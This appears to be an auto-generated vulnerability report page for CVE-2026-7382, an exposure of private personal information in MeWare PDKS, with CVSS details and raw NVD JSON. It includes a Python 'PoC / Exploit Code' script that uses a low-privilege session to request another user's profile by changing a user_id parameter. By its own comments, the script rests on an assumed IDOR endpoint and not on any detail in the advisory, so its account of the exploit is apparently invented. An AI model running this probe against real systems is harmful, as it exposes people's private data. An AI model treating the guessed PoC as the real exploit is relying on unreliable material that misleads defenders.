Security Vulnerability Report
CVE-2026-7382 CVSS 6.5 MEDIUM

CVE-2026-7382

Published: 2026-04-30 13:16:06
Last Modified: 2026-04-30 15:09:04

Description

Exposure of Sensitive Information to an Unauthorized Actor, Exposure of private personal information to an unauthorized actor vulnerability in MeWare Software Development Inc. PDKS allows Excavation. This issue affects PDKS: from V16.20200313 before VMYR_3.5.2025117.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MeWare PDKS V16.20200313
MeWare PDKS: all versions from V16.20200313 up to, but not including, VMYR_3.5.2025117

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_poc(target_url, session_cookie):
    """
    PoC for CVE-2026-7382
    Checks for unauthorized access to sensitive user information.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Cookie": f"session_id={session_cookie}"
    }

    # Attempting to access a sensitive endpoint that should be restricted
    # Assuming an IDOR-like vulnerability where user_id can be manipulated
    payload_url = f"{target_url}/api/v1/users/profile?user_id=1"

    try:
        response = requests.get(payload_url, headers=headers, timeout=10)
        if response.status_code == 200 and "private_personal_info" in response.text:
            print("[+] Vulnerability Confirmed: Sensitive Information Exposed.")
            print("[+] Response Snippet:", response.text[:200])
            return True
        else:
            print("[-] Target not vulnerable or exploit failed.")
            return False
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False


# Usage
# check_poc("http://target-pdk-system.com", "low_priv_session_token")

References

https://www.usom.gov.tr/bildirim/tr-26-0141

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7382", "sourceIdentifier": "[email protected]", "published": "2026-04-30T13:16:06.267", "lastModified": "2026-04-30T15:09:03.710", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive Information to an Unauthorized Actor, Exposure of private personal information to an unauthorized actor vulnerability in MeWare Software Development Inc. PDKS allows Excavation.\n\nThis issue affects PDKS: from V16.20200313 before VMYR_3.5.2025117."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-359"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0141", "source": "[email protected]"}]}}